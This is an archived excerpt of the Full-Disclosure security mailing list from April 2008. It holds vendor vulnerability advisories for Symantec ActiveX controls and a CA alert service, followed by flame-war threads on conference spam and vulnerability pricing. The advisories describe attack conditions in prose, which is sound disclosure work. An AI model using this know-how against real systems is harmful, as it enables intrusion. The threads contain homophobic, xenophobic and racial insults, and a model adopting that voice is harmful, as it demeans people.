While this control is marked as safe for scripting, the control has been designed so that it can only be run from the "symantec.com" domain. In practice this requirement can be bypassed through the use of any Cross Site Scripting (XSS) vulnerabilities in the Symantec domain. Exploitation could also occur through the use of DNS poisoning attacks.

IV. DETECTION

iDefense confirmed that this vulnerability exists in version 2.7.0.1 of the control that is installed with the 2008 version of Norton Internet Security. Other versions may also be available.

V. WORKAROUND

Setting the kill-bit for this control will prevent it from being loaded within Internet Explorer. However, doing so will prevent legitimate use of the control.

VI. VENDOR RESPONSE

Symantec has addressed this vulnerability by releasing updates. For more information, refer to their advisory at the following URL.

http://www.symantec.com/avcenter/security/Content/2008.04.02a.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0312 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

12/05/2007 Initial vendor notification
12/05/2007 Initial vendor response
04/02/2008 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Peter Vreugdenhil.
From labs-no-reply at idefense.com Fri Apr 4 00:01:57 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Thu, 03 Apr 2008 19:01:57 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.02.08: Symantec Internet Security 2008 ActiveDataInfo.LaunchProcess Design Error Vulnerability
Message-ID: <47F561E5.5050000@idefense.com>

iDefense Security Advisory 04.02.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 02, 2008

I. BACKGROUND

Norton Internet Security 2008 is a system security suite that offers protection from spyware, viruses, identity theft, spam, and malicious network traffic. More information can be found on the vendor's site at the following URL.

http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=is&pvid=nis2008

II. DESCRIPTION

Remote exploitation of a design error in an ActiveX control installed with Symantec Norton Internet Security 2008 could allow for the execution of arbitrary code.
Norton Internet Security 2008 installs the following ActiveX control which is registered as safe for scripting:

Progid: SymAData.ActiveDataInfo.1
Clsid: 3451DEDE-631F-421c-8127-FD793AFC6CC8
File: C:\PROGRA~1\COMMON~1\SYMANT~1\SUPPOR~1\SymAData.dll
Version: 2.7.0.1

This control contains functionality designed to allow Symantec to remotely execute programs on the target machine.

III. ANALYSIS

Exploitation allows attackers to execute arbitrary code with the privileges of the currently logged in user. In order for exploitation to occur, an attacker would have to lure a vulnerable user to a malicious web site.

While this control is marked as safe for scripting, the control has been designed so that it can only be run from the "symantec.com" domain. In practice this requirement can be bypassed through the use of any Cross Site Scripting (XSS) vulnerabilities in the Symantec domain. Exploitation could also occur through the use of DNS poisoning attacks.

IV. DETECTION

iDefense confirmed that this vulnerability exists in version 2.7.0.1 of the control that is installed with the 2008 version of Norton Internet Security. Other versions may also be available.

V. WORKAROUND

Setting the kill-bit for this control will prevent it from being loaded within Internet Explorer. However, doing so will prevent legitimate use of the control.

VI. VENDOR RESPONSE

Symantec has addressed this vulnerability by releasing updates. For more information, refer to their advisory at the following URL.

http://www.symantec.com/avcenter/security/Content/2008.04.02a.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0313 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

12/14/2007 Initial vendor notification
12/14/2007 Initial vendor response
04/02/2008 Coordinated public disclosure

IX.
CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

From mlande at bellsouth.net Fri Apr 4 03:21:17 2008
From: mlande at bellsouth.net (Mary Landesman)
Date: Thu, 3 Apr 2008 22:21:17 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw masssecurityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <033901c895fa$913c9b50$6401a8c0@maryl>

I think the concerns you've raised about profiteering/marketing on the list are valid.
I hadn't thought of it from that perspective, frankly.

It can be helpful to have a central resource/calendar to be informed about them. I would subscribe to a specific list for that.

-- Mary

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v
Sent: Thursday, April 03, 2008 5:39 PM
To: Garrett M. Groff; n3td3v; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Fwd: Let's outlaw masssecurityconferencespamming its f****** gay

On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff wrote:
> Regarding the particular person in question, I'll defer to others who know him (or her, or they, or whomever) better than I do. Instead, I'll say that, generally, on lists like FD, there is a minority of outspoken personalities who sadly support the stereotypical hacker persona: condescending egoists who are socially inept and emotionally charged when discussing topics that relate to their knowledge domain. That's unfortunate, since the broader IT security community is poorly represented due to attention-seeking zealots.
>
> Regarding the idea of "outlawing security conference spamming," I'd say the literal idea of outlawing cross-posts to multiple security mailing lists is a bad idea. The idea that the legislature should write into law legislation that reduces our freedom in such a sense is a slippery slope borne of emotionalism and narrowness. What else should the government do to curtail our freedoms? I tend to side with libertarian types (though I don't call myself a "libertarian" unqualified) on what the government should do and what they should not do. And micro-managing security mailing lists is something they should not do. It's a bad idea and would make a dreadful precedent.

Full-Disclosure is meant to be about free source, not making money. I'm against people who make money coming on the mailing lists; it's commercial spam. We can't allow this to continue. Here is what I don't like:

- Come to our conference - profit... buy our ticket, get a MacBook prize.

- Hacking challenge prize - profit... they give you $5000 and sell it to the vendor for a lot more.

- Train to use our software - profit... overpriced training for software... not interested.

On the issue of how much a vulnerability is worth, the prices are not regulated. We need regulation of how much a vulnerability costs, because the prices right now are wild. We need to take vulnerability pricing off the black market and onto a legitimate central website for selling vulnerabilities, or cash rewards for disclosing a vulnerability to a particular company or organisation. I don't like sites like Digital Armaments, which, when I visited it, the content and answers they gave were questionable, and people have complained about Digital Armaments in the past. It's time to get pricing regulated and defined, so everyone knows who's being joe-jobbed and who isn't.

Can someone post to full-disclosure a price list of what they think a buffer overflow should be worth, etc., and we can vote on whether we agree?

So what I'm calling for is someone to post up a hackers' price list per vulnerability type.

XSS/SQL should be worth something as well, so Morning_Wood can buy milk and a newspaper in the mornings after he's taken care of his wood.

Sorry I've ended this e-mail with slight off-topicness, but I do think pricing needs to be defined.

We can't dress up cash prizes/contests as something else either. If a website is offering a $5,000 reward for a vulnerability, we need to know if we're being ripped off with the cash reward and how much can potentially be made after it's sold on.

Robert Lemos even talked about vulnerability pricing (http://www.securityfocus.com/news/11510) when Pwn2Own was on, and even the Pwn2Own cash reward might not be enough money compared to what a vulnerability *should* be worth, taking into consideration how much profit CanSecWest makes overall from people attending the conference.

So you take into consideration how much a vulnerability should be worth, then the added worth because it's a security conference: how much should be added on to counter the profit being made by the event.

A vulnerability should be worth more if it's disclosed at a security conference than if it's bought privately, because you've got to take profit and free advertising into the calculation.

However, to round off, we can't allow the mailing lists to turn into a vulnerability marketplace. Full-disclosure should be for free stuff, and other websites and mailing lists can be set up for *money-making schemes and auctions*.

We shouldn't allow the money makers to directly market X... if a link is put on Full-Disclosure by a member of the public on the fly then that's OK, but I think it's cheeky for the particular conference, contest runner or software trainer to be on the list themselves spamming everyone for a profiteering agenda.

You mention cross-posting; that's not the issue here. It's the people making the money posting to make the money that offends me so much.

And not even the lonely hacker who posts "I've got a vulnerability for sale for X" offends me; I don't mind that on Full-Disclosure. What I do mind is if it's a company or organisation doing it that is directly the one making the money via vulnerability for sale, prize contest, security conference or "train to use our software!!!". That's the height of spam I just think is utterly wrong and unethical on any scale of acceptability.

If a lonely hacker who works in a supermarket has a vulnerability to sell, I'm all for it being posted on full-disclosure, but not the big-money conferences, prize hacking contests and software training guys.

I come under the bracket of supermarket worker with nothing much going for me in life, so I should be allowed to sell a vulnerability on what's meant to be a mailing list for non-profit disclosure.

If we tolerate the money-making schemes much longer, eventually full-disclosure will be awash with conference, training and cash-prize spam, etc., once everyone realises the full value of vulnerabilities and the huge amounts of money to be made from setting up a cash-prize contest, the huge amounts of money to be made from setting up a security conference and the huge amounts of money to be made from training people to use your hax0r software.

You will find it easy to shout me down and say n3td3v's an idiot, but wait till the vulnerability market really takes off and the prices of vulnerabilities are properly defined and regulated; you're going to see a huge increase in commercial spam on the mailing lists, like the full-disclosure mailing list. So we've got to define what's fair-play e-mail and what's a company or organisation blatantly profiteering with X method of extracting money out of people and using skilled hackers to make money, and to promote a security conference, training etc.

All the best,

n3td3v

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From groffg at gmgdesign.com Fri Apr 4 04:22:47 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Thu, 3 Apr 2008 23:22:47 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <76AAE5898B50423A94099BC054C8B16A@Komputer01>

netdev, I'll begin by confessing that I merely skimmed your email and did not peruse it. Having said that, the buying and selling of vulnerabilities is subject to the same forces as the trading of anything else, be it commodities, products, services, securities (such as stocks), or other tradeable assets.

What you proposed is economic in nature and not unique or specific to geekdom. Specifically, what you're suggesting is more in line with Marxism, where a "fair" price is dictated by a central authority. Instead, our system of free-market capitalism is such that vulnerabilities can be bought and sold by whomever wishes to buy and sell them. (Furthermore, evidence suggests that black-market activity would *increase* in cases where trading of a given item is highly restricted on the legitimate market (relegating the trading to the black market); e.g., the trading of illicit drugs exists and is a multi-billion-dollar industry in the US despite laws that proscribe the trading and possession of those drugs.)

--

Regarding the information on conferences and such that are touted on this list (and others), it's something that we'll just have to deal with. This list is unmoderated and, perhaps, there are people who appreciate the information.

- G

----- Original Message -----
From: "n3td3v"
To: "Garrett M. Groff" ; "n3td3v" ;
Sent: Thursday, April 03, 2008 5:38 PM
Subject: Re: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay

> [...]
From redhowlingwolves at nc.rr.com Fri Apr 4 05:36:06 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Fri, 04 Apr 2008 00:36:06 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <76AAE5898B50423A94099BC054C8B16A@Komputer01>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> <76AAE5898B50423A94099BC054C8B16A@Komputer01>
Message-ID: <47F5B036.1010101@nc.rr.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

He has no clue what it means to live in a democracy, much less a federation. Let's let the comedy go on, shall we? Definitely breaks the monotony of everyday BS.

Garrett M. Groff wrote:
> [...]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9bA1s+9h2X0fCGcRAq+9AJ0dieUgKq4pya6mF/oWclEBqj2z3gCgjYEr
uoq2+8AfO1q+TyFj9Fts6z8=
=3d9e
-----END PGP SIGNATURE-----

From redhowlingwolves at nc.rr.com Fri Apr 4 05:38:54 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Fri, 04 Apr 2008 00:38:54 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw masssecurityconferencespamming its f****** gay
In-Reply-To: <033901c895fa$913c9b50$6401a8c0@maryl>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> <033901c895fa$913c9b50$6401a8c0@maryl>
Message-ID: <47F5B0DE.5000702@nc.rr.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

That is what full-disclosure was created for!? Due to the massive influx of media attention, it has come to this.

Mary Landesman wrote:
> [...]
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9bDds+9h2X0fCGcRAmD+AJ4/2PF87IAmuQDZJ4hZB6ZEGtgIMgCfWJJm
FJ+rbr0tUqoFTJ1PoIi8I+c=
=Z3O6
-----END PGP SIGNATURE-----

From redhowlingwolves at nc.rr.com Fri Apr 4 05:28:07 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Fri, 04 Apr 2008 00:28:07 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <47F5AE57.6070502@nc.rr.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Oh how I love your posts. They're all over the place, and at the same time, primitive. I would normally filter such a troll as you, but you keep me in stitches!!

n3td3v rocks!! Just not in the way he thinks!!

n3td3v wrote:
> On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff wrote:
>> Regarding the particular person in question, I'll defer to others who know him (or her, or they, or whomever) better than I do. Instead, I'll say that, generally, on lists like FD, there is a minority of outspoken personalities who sadly support the stereotypical hacker persona: condescending egoists who are socially inept and emotionally charged when discussing topics that relate to their knowledge domain.
>> That's unfortunate, since the broader IT security community is poorly represented due to attention-seeking zealots.
>>
>> Regarding the idea of "outlawing security conference spamming," I'd say the literal idea of outlawing cross-posts to multiple security mailing lists is a bad idea. The idea that the legislature should write into law legislation that reduces our freedom in such a sense is a slippery slope borne of emotionalism and narrowness. What else should the government do to curtail our freedoms? I tend to side with libertarian types (though I don't call myself a "libertarian" unqualified) on what the government should do and what they should not do. And micro-managing security mailing lists is something they should not do. It's a bad idea and would make a dreadful precedent.
>
> Full-Disclosure is meant to be about free source, not making money. I'm against people who make money coming on the mailing lists; it's commercial spam. We can't allow this to continue. Here is what I don't like:
>
> - Come to our conference - profit... buy our ticket, get a MacBook prize.
>
> - Hacking challenge prize - profit... they give you $5000 and sell it to the vendor for a lot more.
>
> - Train to use our software - profit... overpriced training for software... not interested.
>
> On the issue of how much a vulnerability is worth, the prices are not regulated. We need regulation of how much a vulnerability costs, because the prices right now are wild. We need to take vulnerability pricing off the black market and onto a legitimate central website for selling vulnerabilities, or cash rewards for disclosing a vulnerability to a particular company or organisation. I don't like sites like Digital Armaments, which when I visited it, the content and answers they gave were questionable, and people have complained about Digital Armaments in the past. It's time to get pricing regulated and defined, so everyone knows who's being joe-jobbed and who isn't.
>
> Can someone post to Full-Disclosure a price list of what they think a buffer overflow should be worth etc., and we can vote if we agree.
>
> So what I'm calling for is someone to post up a hackers' price list per vulnerability type.
>
> XSS/SQL should be worth something as well, so Morning_Wood can buy milk and a newspaper in the mornings after he's taken care of his wood.
>
> Sorry I've ended this e-mail slightly off-topic, but I do think pricing needs to be defined.
>
> We can't dress up cash prizes/contests as something else as well. If a website is offering a $5,000 reward for a vulnerability, we need to know if we're being ripped off with the cash reward and how much can potentially be made after it's sold on.
>
> Robert Lemos (http://www.securityfocus.com/news/11510) even talked about vulnerability pricing when Pwn2Own was on, and even the Pwn2Own cash reward might not be enough money, compared to what a vulnerability *should* be worth, and taking into consideration how much profit CanSecWest make overall from people attending the conference.
>
> So you take into consideration how much a vulnerability should be worth, then the added worth, because it's a security conference, of how much should be added on to counter the profit being made by the event.
>
> A vulnerability should be worth more if it's disclosed at a security conference than if it's bought privately, because you've got to take in profit and free advertising to calculate.
>
> However, to round off, we can't allow the mailing lists to turn into a vulnerability marketplace. Full-Disclosure should be for free stuff, and other websites and mailing lists can be set up for *money-making schemes and auctions*.
>
> We shouldn't allow the money makers to directly market X... if a link is put on Full-Disclosure by a member of the public on the fly then that's OK, but I think it's cheeky for the particular conference, contest runner or software trainer to be on the list themselves spamming everyone for a profiteering agenda.
>
> You mention cross-posting; that's not the issue here. It's the people making the money posting to make the money that offends me so much.
>
> And not even the lonely hacker who posts "I've got a vulnerability for sale for X" offends me; I don't mind that on Full-Disclosure. But what I do mind is if it's a company or organisation doing it that is directly the one making the money via vulnerability for sale, prize contest, security conference or "train to use our software!!!". That's the height of spam I just think is utterly wrong and unethical on any scale of acceptability.
>
> If a lonely hacker who works in a supermarket has a vulnerability to sell, I'm all for it being posted on Full-Disclosure, but not the big-money conferences, prize hacking contests and software training guys.
>
> I come under the bracket of supermarket worker with nothing much going for me in life, so I should be allowed to sell a vulnerability on what's meant to be a mailing list for non-profit disclosure.
>
> If we tolerate the money-making schemes much longer, eventually Full-Disclosure will be awash with conference, training, cash prize spam, etc. once everyone realises the full value of vulnerabilities and the huge amounts of money to be made from setting up a cash prize contest, the huge amounts of money to be made from setting up a security conference and the huge amounts of money to be made from training people to use your hax0r software.
>
> You will find it easy to shout me down and say n3td3v's an idiot, but wait till the vulnerability market really takes off and the prices of vulnerabilities are properly defined and regulated; you're going to see a huge increase in commercial spam on the mailing lists, like the Full-Disclosure mailing list. So we've got to define what's fair-play e-mail and what's a company or organisation blatantly profiteering with X method of extracting money out of people and using skilled hackers to make money, and to promote a security conference, training etc.
>
> All the best,
>
> n3td3v
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9a5Xs+9h2X0fCGcRAqokAJ0SlqW+YckeRwdGtR2U8KoNu8pyUACgtCub
1jKptMdCec2P6fpyfFR4eAI=
=RqWO
-----END PGP SIGNATURE-----

From randallm at fidmail.com Thu Apr 3 23:50:12 2008
From: randallm at fidmail.com (RM)
Date: Thu, 3 Apr 2008 17:50:12 -0500
Subject: [Full-disclosure] angry
Message-ID:

Sorry. I am angry and tired.

"I WANT STUPID NON-ENGLISH SPEAKING IDIOTS TO STOP SPAMMING ME WITH YOUR MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!

--
There, I feel better.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/eaf5da67/attachment.html

From mlande at bellsouth.net Fri Apr 4 11:25:36 2008
From: mlande at bellsouth.net (Mary Landesman)
Date: Fri, 4 Apr 2008 06:25:36 -0400
Subject: [Full-disclosure] angry
In-Reply-To:
References:
Message-ID: <046001c8963e$39278850$6401a8c0@maryl>

Are you saying you are OK with stupid English-speaking idiots spamming you?
-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of RM
Sent: Thursday, April 03, 2008 6:50 PM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] angry

Sorry. I am angry and tired.

"I WANT STUPID NON-ENGLISH SPEAKING IDIOTS TO STOP SPAMMING ME WITH YOUR MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!

--
There, I feel better.

From jeff.stebelton at gmail.com Fri Apr 4 12:56:38 2008
From: jeff.stebelton at gmail.com (Jeff Stebelton)
Date: Fri, 04 Apr 2008 07:56:38 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <47F61776.6080001@gmail.com>

This is an unmoderated list.

Unmoderated: What's an unmoderated list? An unmoderated list is one where your messages are automatically sent to all the other list subscribers, without human intervention.

Unmoderated.

From seclists.org:

Full Disclosure -- An unmoderated high-traffic forum for disclosure of security information. Fresh vulnerabilities sometimes hit this list many hours before they pass through the Bugtraq moderation queue. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. Unfortunately 80% of the posts are worthless drivel, so finding the gems takes patience.

Truer words never spoken. =-)

n3td3v wrote:
> Full-Disclosure is meant to be about free source, not making money. I'm against people who make money coming on the mailing lists; it's commercial spam. We can't allow this to continue. Here is what I don't like:
>

From Dirk_Kollberg at avertlabs.com Fri Apr 4 11:36:57 2008
From: Dirk_Kollberg at avertlabs.com (Kollberg, Dirk)
Date: Fri, 4 Apr 2008 11:36:57 +0100
Subject: [Full-disclosure] angry
In-Reply-To: <046001c8963e$39278850$6401a8c0@maryl>
Message-ID:

I think he should worry more about the way they found out he has a need for penis enlargements or a loan.

BTW, if someone knows why I receive this penis reduction spam, please let me know.

Thanks,
Dirk

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mary Landesman
Sent: Friday, 4 April 2008 12:26
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] angry

Are you saying you are OK with stupid English-speaking idiots spamming you?

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of RM
Sent: Thursday, April 03, 2008 6:50 PM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] angry

Sorry. I am angry and tired.

"I WANT STUPID NON-ENGLISH SPEAKING IDIOTS TO STOP SPAMMING ME WITH YOUR MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!

--
There, I feel better.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From James.Williams at ca.com Fri Apr 4 13:25:31 2008
From: James.Williams at ca.com (Williams, James K)
Date: Fri, 4 Apr 2008 08:25:31 -0400
Subject: [Full-disclosure] CA Alert Notification Server Multiple Vulnerabilities
Message-ID: <649CDCB56C88AA458EFF2CBF494B62040495BCF5@USILMS12.ca.com>

Title: CA Alert Notification Server Multiple Vulnerabilities

CA Advisory Date: 2008-04-03

Reported By: An anonymous researcher working with the iDefense VCP

Impact: A remote authenticated attacker can execute arbitrary code or cause a denial of service condition.

Summary: The CA Alert Notification Server service contains multiple vulnerabilities that can allow a remote authenticated attacker to execute arbitrary code or cause a denial of service condition. CA has issued updates to address the vulnerabilities. The vulnerabilities, CVE-2007-4620, are due to insufficient bounds checking in multiple procedures. A remote authenticated attacker or local user can exploit a buffer overflow to execute arbitrary code or cause a denial of service.

Mitigating Factors: A remote attacker must have legitimate authentication credentials.

Severity: CA has given these vulnerabilities a maximum risk rating of High.

Affected Products:
CA Anti-Virus for the Enterprise 7.1
CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8
CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8.1
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1
BrightStor ARCserve Backup r11.5
BrightStor ARCserve Backup r11.1
BrightStor ARCserve Backup r11 for Windows

Affected Platforms: Windows

Status and Recommendation:
CA has provided updates to address the vulnerabilities.
CA Anti-Virus for the Enterprise 7.1, CA Anti-Virus for the Enterprise r8: QO96079
CA Threat Manager for the Enterprise r8: QO96387
CA Anti-Virus for the Enterprise r8.1, CA Threat Manager for the Enterprise r8.1: QO96080
BrightStor ARCserve Backup r11.5, BrightStor ARCserve Backup r11.1: QO96079
BrightStor ARCserve Backup r11.0: Upgrade to 11.1 and apply the latest patches.

How to determine if you are affected:
For products on Windows:
1. Using Windows Explorer, locate the file "alert.exe". By default, the file is located in the "C:\Program Files\CA\SharedComponents\Alert" directory.
2. Right click on the file and select Properties.
3. Select the Version tab.
4. If the file version is earlier than indicated in the below table, the installation is vulnerable. Compare the four dotted fields as numbers, not as text: 7.1.758.0 is earlier than 7.1.1000.0.

Product                                    File        Version
CA Anti-Virus for the Enterprise r8.1      Alert.exe   8.1.586.0
CA Threat Manager for the Enterprise r8.1  Alert.exe   8.1.586.0
CA Threat Manager for the Enterprise r8    Alert.exe   8.0.450.0
CA Anti-Virus for the Enterprise 7.1       Alert.exe   7.1.758.0
CA Anti-Virus for the Enterprise r8        Alert.exe   7.1.758.0
BrightStor ARCserve Backup r11.5           Alert.exe   7.1.758.0
BrightStor ARCserve Backup r11.1           Alert.exe   7.1.758.0

Workaround: None

References (URLs may wrap):
CA Support: http://support.ca.com/
Security Notice for Alert Notification Server
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=173103
Solution Document Reference APARs: QO96079, QO96387, QO96080
CA Security Response Blog posting: CA Alert Notification Server Multiple Vulnerabilities
http://community.ca.com/blogs/casecurityresponseblog/archive/2008/04/04/\
ca-alert-notification-server-multiple-vulnerabilities.aspx
Reported By: An anonymous researcher working with the iDefense VCP
CVE References: CVE-2007-4620
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4620
OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form.
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2008 CA. All rights reserved.

From kf_lists at digitalmunition.com Fri Apr 4 13:55:37 2008
From: kf_lists at digitalmunition.com (Kevin Finisterre (lists))
Date: Fri, 4 Apr 2008 08:55:37 -0400
Subject: [Full-disclosure] angry
In-Reply-To:
References:
Message-ID:

You are black too?

-KF

On Apr 4, 2008, at 6:36 AM, Kollberg, Dirk wrote:
>
>
> BTW, if someone knows why I receive this penis reduction spam, please let me know.
>
> Thanks,
> Dirk
>
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mary Landesman
> Sent: Friday, 4 April 2008 12:26
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] angry
>
> Are you saying you are OK with stupid English-speaking idiots spamming you?
>
